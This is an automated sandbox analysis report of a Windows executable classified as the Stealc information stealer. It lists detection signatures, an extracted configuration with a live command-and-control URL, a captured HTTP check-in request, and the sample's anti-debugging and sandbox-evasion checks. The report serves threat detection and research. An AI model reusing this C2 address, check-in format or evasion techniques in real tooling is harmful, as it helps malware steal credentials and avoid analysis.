
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525234
MD5: 67ba8a4a441b8c1e892ab227cc5f142a
SHA1: 5cf0a0706a9db5ec122d52576479f62327a655b1
SHA256: 12db50d8781fb72163f2cc3eb674b94558050eb9e965c02ea8936ed1770ca298
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 67BA8A4A441B8C1E892AB227CC5F142A)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6952 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6952 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.ec0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T22:50:59.767145+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.ec0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00ECC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00EC9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00EC7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00EC9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00ED8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00ED38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ED4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00ECDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00ECE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00ED4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00ECED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00EC16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00ED3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ECF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00ECBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ECDE10

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 41 33 41 41 46 35 45 32 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a | Data Ascii: ------GCGHJEBGHJKEBFHIJDHC | Content-Disposition: form-data; name="hwid" | 40A3AAF5E2363848468766 | ------GCGHJEBGHJKEBFHIJDHC | Content-Disposition: form-data; name="build" | doma | ------GCGHJEBGHJKEBFHIJDHC--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00EC4880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 41 33 41 41 46 35 45 32 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a | Data Ascii: ------GCGHJEBGHJKEBFHIJDHC | Content-Disposition: form-data; name="hwid" | 40A3AAF5E2363848468766 | ------GCGHJEBGHJKEBFHIJDHC | Content-Disposition: form-data; name="build" | doma | ------GCGHJEBGHJKEBFHIJDHC--
Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/K
Source: file.exe, 00000000.00000002.1720287948.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37D

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 | 0_2_0129A9D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B05F | 0_2_0128B05F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01294309 | 0_2_01294309
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01251BD9 | 0_2_01251BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01295A65 | 0_2_01295A65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01282ABA | 0_2_01282ABA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128955C | 0_2_0128955C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01280DD6 | 0_2_01280DD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01296CD6 | 0_2_01296CD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01285F31 | 0_2_01285F31
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128E750 | 0_2_0128E750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B279D | 0_2_011B279D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012887E4 | 0_2_012887E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01152656 | 0_2_01152656
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130AE9C | 0_2_0130AE9C
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EC45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qtygkfie ZLIB complexity 0.9948816067950255
Source: file.exe, 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00ED8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00ED3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\R700J588.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1864704 > 1048576
Source: file.exe | Static PE information: Raw size of qtygkfie is bigger than: 0x100000 < 0x1a1200

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ec0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qtygkfie:EW;bnphghxp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qtygkfie:EW;bnphghxp:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00ED9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d0281 should be: 0x1cd22a
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: qtygkfie
Source: file.exe | Static PE information: section name: bnphghxp
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131B93E push ebp; mov dword ptr [esp], ecx | 0_2_0131BBAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012B3906 push edx; mov dword ptr [esp], eax | 0_2_012B397D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0134990B push 46BC0A8Ch; mov dword ptr [esp], ebp | 0_2_0134991C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01317171 push 7E60A1C9h; mov dword ptr [esp], edi | 0_2_01317189
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C2965 push 0186C1C0h; mov dword ptr [esp], edi | 0_2_012C29CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C2965 push ebx; mov dword ptr [esp], eax | 0_2_012C29EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01351955 push eax; mov dword ptr [esp], ecx | 0_2_01351990
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132D156 push ebp; mov dword ptr [esp], 5D7F081Ch | 0_2_0132D16A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132D156 push ebp; mov dword ptr [esp], 59ADBC45h | 0_2_0132D1C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013361BD push eax; mov dword ptr [esp], ebp | 0_2_013361F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013361BD push ebp; mov dword ptr [esp], edi | 0_2_01336218
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01312192 push esi; mov dword ptr [esp], ecx | 0_2_01312197
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01312192 push eax; mov dword ptr [esp], edx | 0_2_0131219B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01312192 push 164F8C61h; mov dword ptr [esp], ebx | 0_2_013122C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01312192 push 08AD4DE6h; mov dword ptr [esp], edi | 0_2_0131231B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01312192 push eax; mov dword ptr [esp], esi | 0_2_01312387
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B09F7 push ebp; mov dword ptr [esp], 775B520Bh | 0_2_013B0B28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B09F7 push 1B94E1D8h; mov dword ptr [esp], ebp | 0_2_013B0B9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDB035 push ecx; ret | 0_2_00EDB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push 18723EB6h; mov dword ptr [esp], ecx | 0_2_0129A9EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push ebx; mov dword ptr [esp], 037F8D09h | 0_2_0129AA19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push 6AEDD8F4h; mov dword ptr [esp], ecx | 0_2_0129AA38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push ebx; mov dword ptr [esp], ebp | 0_2_0129AA4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push 3A4CD654h; mov dword ptr [esp], esi | 0_2_0129AAA6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push ebp; mov dword ptr [esp], esp | 0_2_0129AAB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push edi; mov dword ptr [esp], esi | 0_2_0129AB06
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push esi; mov dword ptr [esp], 5D571A16h | 0_2_0129AB54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push 19EE6115h; mov dword ptr [esp], ebp | 0_2_0129ABCE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push ebx; mov dword ptr [esp], 6FFEBFF7h | 0_2_0129AC0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push 55EB2F39h; mov dword ptr [esp], edx | 0_2_0129AC1C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A9D9 push edi; mov dword ptr [esp], eax | 0_2_0129AC5F
Source: file.exe | Static PE information: section name: qtygkfie entropy: 7.952733470198543

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00ED9860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13362
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A034A second address: 12A034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A034E second address: 12A0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FC2CCD28622h 0x0000000e jmp 00007FC2CCD28616h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F597 second address: 129F5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2CCC4B424h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F87C second address: 129F880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F880 second address: 129F897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC2CCC4B41Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F897 second address: 129F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F89D second address: 129F8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F8A3 second address: 129F8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC2CCD28610h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2B1C second address: 12A2B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B41Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D19B4h], ebx 0x00000011 push 00000000h 0x00000013 or cx, 1AA2h 0x00000018 call 00007FC2CCC4B419h 0x0000001d push edi 0x0000001e jmp 00007FC2CCC4B426h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2B66 second address: 12A2B70 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2CCD28606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
